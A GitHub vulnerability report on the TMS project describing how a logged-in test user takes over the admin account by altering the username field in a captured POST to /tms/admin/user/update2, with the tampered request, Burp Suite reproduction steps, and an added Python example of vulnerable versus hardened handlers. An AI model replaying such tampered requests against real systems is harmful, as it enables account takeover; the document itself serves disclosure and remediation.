There is an Insecure Permissions vulnerability in tms #16

Closed
afeng2016-s opened this issue Feb 24, 2022 · 1 comment

Comments

@afeng2016-s

[Suggested description]
There is an ultra vires vulnerability in the function for modifying personal information in TMS. The vulnerability originates from /tms/admin/user/update2. The administrator account and password can be modified beyond the user's authority by modifying the packet parameters.

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

[Attack Type]
Remote

[Vulnerability proof]

1. Access with the test account http://localhost:8080/tms/admin

2. In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.
Now I log in to the test account to try to change the information and password of the admin account.

3. Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.

4. Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent -> click the confirm submit button.

5. Modify the packet capture data, as shown in the following figure.

6. Click Forward to finish the modification.

The information of admin, when viewed, has changed. Vulnerability reproduction completed.
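The defect in the report is that the update handler takes the account to edit from the `username` field of the POST body instead of from the logged-in session, and does not ask for the current password. The following is an added example, not code from the tms project or from the issue author: it models that endpoint as two plain Python handlers, one reproducing the reported behaviour and one hardened, so the check that is missing can be seen side by side. The user store, the session dictionary, the form dictionary and the `AUDIT_LOG` list are constructed stand-ins for the real web framework; the hashing scheme is an assumption, not tms's.

```python
# Added example (not tms project code): the profile-update handler with and without
# the server-side ownership check that the report shows is missing.
import hashlib
import hmac
import secrets
from typing import Optional

PBKDF2_ROUNDS = 100_000

# Audit trail used by the hardened handler; a real deployment would write to the app log.
AUDIT_LOG = []


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'saltHex$digestHex' (assumed scheme)."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def make_users() -> dict:
    """Constructed sample accounts: the admin from the report and a low-privilege tester."""
    return {
        "admin": {"password": hash_password("88888888"), "name": "admin", "mail": "admin@example.com", "role": "admin"},
        "test": {"password": hash_password("test1234"), "name": "test", "mail": "test@example.com", "role": "user"},
    }


def update_profile_vulnerable(users: dict, session: dict, form: dict) -> tuple:
    """Behaviour the report describes: the account to edit comes from the POST body and no
    current password is required, so any logged-in user can rewrite any account."""
    if "user" not in session:
        return 401, "not authenticated"
    target = form.get("username")  # client-controlled: this is the defect
    if target not in users:
        return 404, "no such user"
    record = users[target]
    if form.get("password"):
        record["password"] = hash_password(form["password"])
    record["name"] = form.get("name", record["name"])
    record["mail"] = form.get("mail", record["mail"])
    return 200, "updated"


def update_profile_fixed(users: dict, session: dict, form: dict) -> tuple:
    """Hardened version: only the session principal can be edited, a submitted username
    that differs from it is rejected and logged, and a password change needs the old one."""
    principal = session.get("user")
    if principal is None or principal not in users:
        return 401, "not authenticated"
    submitted = form.get("username")
    if submitted is not None and submitted != principal:
        # Mismatch between session user and form user is the tampering signature in the
        # report; record it so it can be alerted on.
        AUDIT_LOG.append(f"username mismatch: session={principal} form={submitted}")
        return 403, "forbidden"
    record = users[principal]
    if form.get("password"):
        if not verify_password(form.get("old_password", ""), record["password"]):
            return 403, "current password required"
        record["password"] = hash_password(form["password"])
    record["name"] = form.get("name", record["name"])
    record["mail"] = form.get("mail", record["mail"])
    return 200, "updated"


if __name__ == "__main__":
    # Replay the report: the 'test' session submits the admin's username with a new password.
    tampered = {"username": "admin", "password": "change123", "name": "admin", "mail": "admin@google.com"}
    users = make_users()
    print(update_profile_vulnerable(users, {"user": "test"}, tampered),
          verify_password("change123", users["admin"]["password"]))  # (200, 'updated') True
    users = make_users()
    print(update_profile_fixed(users, {"user": "test"}, tampered),
          verify_password("88888888", users["admin"]["password"]))  # (403, 'forbidden') True
    print(AUDIT_LOG)
```

The point of the hardened handler is that the target account is never read from the request at all; the `username` field is only compared against the session and logged when it disagrees, which also gives a simple detection rule for attempts like the one in the report.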

@xiweicheng
Owner

yes, fixed. 👍
